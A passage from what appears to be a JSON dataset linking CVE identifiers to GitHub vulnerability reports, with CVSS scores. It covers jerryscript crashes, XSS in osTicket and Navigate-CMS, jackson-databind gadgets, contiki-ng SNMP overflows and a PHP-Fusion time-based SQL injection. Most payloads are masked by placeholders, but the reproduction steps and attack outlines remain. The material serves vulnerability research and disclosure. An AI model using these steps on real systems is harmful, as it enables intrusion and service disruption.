PATHTAG FILETAG Output Program received signal SIGABRT, Aborted. Backtrace Program received signal SIGABRT, Aborted. __GI_raise (sig=sig APITAG at PATHTAG (gdb) bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6e NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ac NUMBERTAG in jerry_port_fatal NUMBERTAG beef in jerry_fatal NUMBERTAG f NUMBERTAG d3 in ecma_ref_object NUMBERTAG cd in ecma_copy_value NUMBERTAG cf7c in vm_loop NUMBERTAG b5f6 in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG in ecma_op_function_call_simple NUMBERTAG f2d6 in ecma_op_function_call NUMBERTAG b9aa in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG e in jerry_run NUMBERTAG f NUMBERTAG df in main ()",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13991",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3858",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3858",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-05T03:38:44Z",
        "description": "SEGV in ecma_deref_ecma_string. APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"; function NUMBERTAG const NUMBERTAG return NUMBERTAG const NUMBERTAG APITAG \"species NUMBERTAG let NUMBERTAG while NUMBERTAG const NUMBERTAG APITAG } const NUMBERTAG species NUMBERTAG const NUMBERTAG let NUMBERTAG if NUMBERTAG const NUMBERTAG set NUMBERTAG const NUMBERTAG APITAG } else NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG let NUMBERTAG let NUMBERTAG while NUMBERTAG let NUMBERTAG gc; APITAG NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG Symbol NUMBERTAG const NUMBERTAG APITAG } APITAG Execution steps PATHTAG FILETAG Output APITAG Backtrace Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffd0c in ecma_deref_ecma_string () (gdb) bt NUMBERTAG ffd0c in ecma_deref_ecma_string NUMBERTAG a NUMBERTAG bb in opfunc_spread_arguments NUMBERTAG in vm_loop NUMBERTAG b5f6 in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG in ecma_op_function_call_simple NUMBERTAG f2d6 in ecma_op_function_call NUMBERTAG b9aa in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG e in jerry_run NUMBERTAG f NUMBERTAG df in main ().",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13991",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3859",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3859",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-05T03:41:34Z",
        "description": "SEGV in jmem_pools_finalize . APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG APITAG const NUMBERTAG APITAG let NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG gc; const NUMBERTAG APITAG } APITAG Execution steps PATHTAG FILETAG Output APITAG Backtrace Program received signal SIGSEGV, Segmentation fault NUMBERTAG bd5f in jmem_pools_finalize () (gdb) bt NUMBERTAG bd5f in jmem_pools_finalize NUMBERTAG a7bb in jmem_finalize NUMBERTAG f2ba0 in main ()",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14012",
        "Issue_Url_old": "https://github.com/osTicket/osTicket/issues/5514",
        "Issue_Url_new": "https://github.com/osticket/osticket/issues/5514",
        "Repo_new": "osticket/osticket",
        "Issue_Created_At": "2020-05-21T10:01:21Z",
        "description": "Cross Site Scripting Vulnerability on APITAG feature in APITAG Description: A authenticated malicious user can take advantage of a Reflected XSS vulnerability in the APITAG feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". OS: firefox Steps to Reproduce NUMBERTAG Log into the panel APITAG NUMBERTAG Go to PATHTAG NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG New Category NUMBERTAG Insert payload to Category Name or Category Description: \"> APITAG Expected behavior: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-14042",
        "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1122",
        "Issue_Url_new": "https://github.com/codiad/codiad/issues/1122",
        "Repo_new": "codiad/codiad",
        "Issue_Created_At": "2020-06-03T15:02:11Z",
        "description": "Multiple vulnerabilities that can result in RCE. Hello, Our research team in Checkmarx found multiple vulnerabilities in Codiad (XSS, CSRF, SSRF, RCE), we tried to contact the top three maintainers and none of them are active. If there are any active developers on this project feel free to contact us for more information. EMAILTAG Best regards, Yaniv.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-14060",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2688",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2688",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-04-16T15:11:49Z",
        "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Topsec(tcc) from Alphalab Security Team Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-14061",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2698",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2698",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-04-25T02:27:29Z",
        "description": "Block one more gadget type (aqjms). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Fangrun Li APITAG Security Team at Qihoo NUMBERTAG Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-14062",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2704",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2704",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-04-30T00:43:03Z",
        "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): APITAG from Security Team of Alibaba Cloud Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-14148",
        "Issue_Url_old": "https://github.com/ngircd/ngircd/issues/277",
        "Issue_Url_new": "https://github.com/ngircd/ngircd/issues/277",
        "Repo_new": "ngircd/ngircd",
        "Issue_Created_At": "2020-05-12T18:35:15Z",
        "description": "APITAG out of bounds index access (AFL + libdislocate). I have found an out of bounds error by fuzzing ngircd using AFL and libdislocate (a custom memory allocator). APITAG is called with APITAG which leads to a crash when accessing APITAG . The binary is built from APITAG with patches to fi NUMBERTAG and NUMBERTAG and APITAG patched into APITAG in order to support APITAG . Build flags: ./configure without syslog CC=afl clang fast Run mode: ngircd n f PATHTAG Input ( FILETAG : CODETAG Stacktrace: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14148",
        "Issue_Url_old": "https://github.com/ngircd/ngircd/issues/274",
        "Issue_Url_new": "https://github.com/ngircd/ngircd/issues/274",
        "Repo_new": "ngircd/ngircd",
        "Issue_Created_At": "2020-05-10T16:39:55Z",
        "description": "iconv related crash (AFL). I have been fuzzing ngircd using AFL a bit, based on inputs that are used in the testsuite. AFL has found input that can be used to crash a server that has been built with APITAG . My current hypothis is that the crash happens because the APITAG context that is passed into iconv is invalid (i.e. has not been been initialized at all using APITAG ). Build flags: APITAG Run mode: APITAG Input ( FILETAG : APITAG Stacktrace: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14149",
        "Issue_Url_old": "https://github.com/troglobit/uftpd/issues/30",
        "Issue_Url_new": "https://github.com/troglobit/uftpd/issues/30",
        "Repo_new": "troglobit/uftpd",
        "Issue_Created_At": "2020-05-21T14:54:52Z",
        "description": "Null Pointer Dereference / Crash. Hi! I found a bug that crashes the forked child pre authenticated. The details are as follows: Triggering the Bug ERRORTAG output of GDB session attached to APITAG : ERRORTAG registers CODETAG rdi is NUMBERTAG the stack trace is as follows: CODETAG the relevant source code in APITAG CODETAG APITAG so dir might be NULL but will be used in the APITAG macro with a call to APITAG . As can be seen from the stack trace APITAG and is APITAG at this point which causes the crash. To force APITAG we can look at APITAG in APITAG which calls APITAG here APITAG and APITAG returns the pointer at the end of the function: CODETAG So we have to look at APITAG in APITAG . The trace that leads to APITAG is the following: CODETAG Best Martin",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14153",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2020-07-27T14:47:40Z",
        "description": "Is CVETAG present in libjpeg turbo?. URLTAG URLTAG My best guess is that this is fixed in the following change in jpeg NUMBERTAG d: CODETAG Is this any vulnerability that is or was present in libjpeg turbo?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-14163",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3804",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3804",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-27T18:29:22Z",
        "description": "Memory corruption in ecma_gc_set_object_visited ( PATHTAG ). APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG and APITAG Mac OS X APITAG NUMBERTAG APITAG NUMBERTAG E NUMBERTAG Build steps CODETAG ERRORTAG Test case to reproduce the bug for this APITAG keep the same filename length and run the interpreter providing the basename only, as in the Execution steps below. filename: APITAG ERRORTAG Execution steps ERRORTAG ERRORTAG Backtrace ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14195",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2765",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2765",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-06-13T23:22:50Z",
        "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Al1ex MENTIONTAG Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-14295",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3622",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3622",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-06-17T07:02:46Z",
        "description": "FILETAG Expected behavior change the following lines : URLTAG CODETAG You should do APITAG instead of '%\" . get_request_var('filter') . \"%. Additional context As the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database. ERRORTAG Then call APITAG and get the shell_exec called with the path_php_binary. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-14330",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/68400",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/68400",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-03-23T11:01:05Z",
        "description": "uri module set string with masked content into content and json output. SUMMARY uri module set string with masked content into content and json output ISSUE TYPE Bug Report COMPONENT NAME uri ANSIBLE VERSION ERRORTAG CONFIGURATION APITAG OS / ENVIRONMENT STEPS TO REPRODUCE yaml hosts: localhost connection: local tasks: name: send request uri: url: \" URLTAG \" user: admin password: admin method: GET force_basic_auth: yes return_content: yes status_code NUMBERTAG register: response name: extract value vars: query: APITAG set_fact: value_content: \"{{ APITAG }}\" value_content_parsed: \"{{ APITAG | from_json | json_query(query) }}\" value_json: \"{{ APITAG }}\" name: debug debug: msg: \"{{ 'something with admin' in value_json }}\" \"{{ 'something with admin' in value_content }}\" \"{{ 'something with admin' in value_content_parsed }}\" \"{{ 'something with ' in value_json }}\" \"{{ 'something with ' in value_content }}\" \"{{ 'something with ' in value_content_parsed }}\" EXPECTED RESULTS The module should return the json/content value with the correct values ACTUAL RESULTS The module seems to apply sensitive info masking (' ') to value matching username/password in its output APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-14408",
        "Issue_Url_old": "https://github.com/agentejo/cockpit/issues/1310",
        "Issue_Url_new": "https://github.com/agentejo/cockpit/issues/1310",
        "Repo_new": "agentejo/cockpit",
        "Issue_Created_At": "2020-06-17T11:03:12Z",
        "description": "Reflected XSS in login panel. Insufficient sanitization of to parameter in APITAG route allows for injection of arbitrary APITAG code into webpage content creating a reflected XSS attack vector. See below POC : APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-14462",
        "Issue_Url_old": "https://github.com/mitre/caldera/issues/1755",
        "Issue_Url_new": "https://github.com/mitre/caldera/issues/1755",
        "Repo_new": "mitre/caldera",
        "Issue_Created_At": "2020-06-15T13:33:47Z",
        "description": "FILETAG I have no idea if you guys are interested in that type of vulnerability but i thought it would be nice to inform you anyway :) ! Have a good day, Defte",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-14470",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6438",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6438",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-06-19T04:37:00Z",
        "description": "Helm chart download can leak feed password. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description In certain circumstances, downloading a package from the helm feed can leak the feed password to a deployment log. This means that an authenticated user could see a password that they would potentially not be authorized to view. Affected versions Octopus Server NUMBERTAG APITAG Mitigation Not a lot of good options here: Upgrade to APITAG rotate feed passwords on a regular basis Workarounds None known.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-14927",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/19",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/19",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2020-06-19T04:43:11Z",
        "description": "Cross Site Script Vulnerability APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the name= \" Aliases \" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG > Web sites NUMBERTAG Go to \"create > Aliases > add NUMBERTAG add \"// \"> APITAG \" in textbox Alias and Real URL NUMBERTAG Click \"save\". result FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-14931",
        "Issue_Url_old": "https://github.com/jaygreig86/dmitry/issues/4",
        "Issue_Url_new": "https://github.com/jaygreig86/dmitry/issues/4",
        "Repo_new": "jaygreig86/dmitry",
        "Issue_Created_At": "2020-06-19T16:45:09Z",
        "description": "Remote Stack Overflow (possible RCE). Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connects are unencrypted TCP. This is distinctly different from CVETAG because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code. APITAG For simplicity, I'm going to redirect APITAG WHOIS query by modifying my local APITAG : APITAG Next, I use nc to act as the WHOIS server: CODETAG While that's running, let's see what happens in APITAG ERRORTAG Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14934",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1352",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1352",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2020-08-17T19:31:04Z",
        "description": "Buffer overflow in .bss section due to SNMP request overflow. Description of defect References: FILETAG FILETAG File: FILETAG FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by APITAG function without verification of the varbinds buffer capacity. The buffer is allocated in .bss as a static variable: URLTAG The varbinds memory buffer is written with the values provided in SNMP request: URLTAG The buffer capacity is determined at compile time by the following definition: URLTAG If the number of variables in the request exceeds the allocated buffer a memory write out of the buffer boundaries occurs. The write operation beyond the buffer capacity provides possibility to overwrite other variables allocated in the .bss section by the application. As the sender of the frame is in controll of the content that will be written beyond the buffer limits and there is no strict process memory separation in contiki ng, this issue may allow overwriting of sensitive memory areas of APITAG device. Type: Out of bounds memory write Result: Memory corruption Memory write to initialized variables segment with arbitrary data Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? An example hex encoded SNMP request causing out of bounds memory write to varbinds: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14935",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1353",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1353",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2020-08-17T19:35:01Z",
        "description": "Stack overflow in SNMP bulk request processing. Description of defect References: FILETAG FILETAG File: FILETAG FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP bulk get request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by APITAG function without verification of the varbinds buffer capacity. The varbinds memory buffer is written with the values provided in SNMP request: URLTAG The buffer capacity is determined by: URLTAG SNMP get bulk requests are processed by APITAG function that allocates a local stack buffer for buffering OIDs of the requested variables. URLTAG The stack buffer in APITAG is populated with OIDs as a first step before any further processing of the data. URLTAG The varbinds_length variable value is not verified against the capacity of the temporary oid stack buffer. If the number of requested OIDs exceeds the buffer capacity a stack buffer overflow condition occurs and stack memory beyond the allocated oid buffer is overwritten with OIDs received in SNMP get bulk request. As the OIDs are supplied in the request content it may be possible to alter the return address from the APITAG function. If the target architecture uses common addressing space for program and data memory (which is common in APITAG devices) it may also be possible to supply code in the SNMP request payload and redirect the execution path to the injected code by modification of the return address. Type: Out of bounds memory write Stack memory overwrite Return address alteration Remote altering of code execution path Remote executable code injection Remote code execution Result: Memory corruption Remote code execution Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? An example SNMP request causing stack overwrite: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14936",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1351",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1351",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2020-08-17T19:24:47Z",
        "description": "Out of bounds memory read/write in SNMP agent. Description of defect References: FILETAG FILETAG File: FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP request with malformed OID is processed using APITAG APITAG or APITAG when parsing a request or assembling a response. Buffers dedicated to storing OID values used by the SNMP implementation are fixed size with predefined length configurable at compile time: URLTAG All snmp_varbind_t type variables encapsulate an OID buffer of the predefined length: URLTAG With the following occurences of OID buffers allocation in the SNMP code: Static allocation in .bss: URLTAG Stack allocation: URLTAG APITAG In OID decoding function : URLTAG the length of OID data is not verified against the input buffer remaining length. The value in the buffer is trusted to indicate correct number of following OID data bytes: URLTAG The result of decoding is used for computing pointer to the end of buffer, which may result in buf_end variable pointing beyond the input message end: URLTAG as the BER length decoding function does not perform decoded length validation against the input buffer remaining length: URLTAG In addition to the above, the check of provided oid output buffer in snmp_oid_decode_oid: URLTAG may not protect against the overflow when called from SNMP request parsing function: URLTAG due to the fact that oid_len variable remains uninitialized during the call to the function. As a result of the above, memory beyond provided input buffer may be read accessed and memory beyond target buffer capacity may be written if an OID with length larger than SNMP_MSG_OID_MAX_LEN is present in SNMP request message. As the content of write operation is directly provided in the SNMP request, it may be possible to overwrite stack or .bss memory regions with arbitrary content provided in a request with OID length exceeding SNMP_MSG_OID_MAX_LEN limit. APITAG ERRORTAG OID copy and encode functions rely on the fact that the decoded OID has been terminated with a null termination value without verification of the targete buffers capacity. This makes both of the functions vulnerable to similar out ouf bounds writes. Type: Out of bounds memory read Out of bounds memory write Result: Memory corruption Memory write to areas after the target buffer end with arbitrary data Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? Example code demonstrating memory buffer overflow when decoding OID: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14937",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1354",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1354",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2020-08-17T19:36:28Z",
        "description": "Out of bounds memory access in SNMP BER decoder/encoder routines. Description of defect References: FILETAG FILETAG File: FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP ASN NUMBERTAG BER encoder/decoder routines. The length of provided input/output buffers is insufficiently verified when encoding and decoding data. Lack of boundary checks may lead to out of bounds buffer read or write access. Example functions that make access to memory without prior verification of sufficient input data length: URLTAG URLTAG URLTAG URLTAG URLTAG Type: Out of bounds memory access Result: Memory corruption Invalid memory read access Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14942",
        "Issue_Url_old": "https://github.com/tendenci/tendenci/issues/867",
        "Issue_Url_new": "https://github.com/tendenci/tendenci/issues/867",
        "Repo_new": "tendenci/tendenci",
        "Issue_Created_At": "2020-06-19T05:57:47Z",
        "description": "Unrestricted deserialization. APITAG There is no limit to the input of the pickle called, there will be problems CODETAG query field APITAG Find the request to save the field from the form CODETAG Save the field as follows CODETAG This place is to save the serialized value to the template, and then the front end template uses the encoded value request, and the background is deserialized. eg: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14960",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2327",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2327",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-05-18T03:41:20Z",
        "description": "Authenticated Time base SQL Injection in Comments APITAG Describe the bug I've identified an SQL injection vulnerability in the website APITAG that affects the endpoint PATHTAG and can be exploited via the ctype param. I didn't extract any data from the database, I've confirmed the vulnerability using sleep SQL queries with various arithmetic operations. The sleep command combined with the arithmetic operations will cause the server to sleep for various amounts of time depending on the result of the arithmetic operation. For example, setting the value APITAG APITAG / will cause the server to sleep for sum of three time APITAG NUMBERTAG seconds or sleep NUMBERTAG will cause the server to sleep for NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to login as admin NUMBERTAG Go to Content Admin > Comments NUMBERTAG Filter comments POC: APITAG the following HTTP request APITAG sleep NUMBERTAG s):_ CODETAG APITAG Server to sleep for NUMBERTAG seconds_ FILETAG APITAG the following HTTP request APITAG sleep NUMBERTAG s):_ CODETAG APITAG Server to sleep for NUMBERTAG seconds_ FILETAG Impact An attacker can manipulate the SQL statements that are sent to the APITAG database and inject 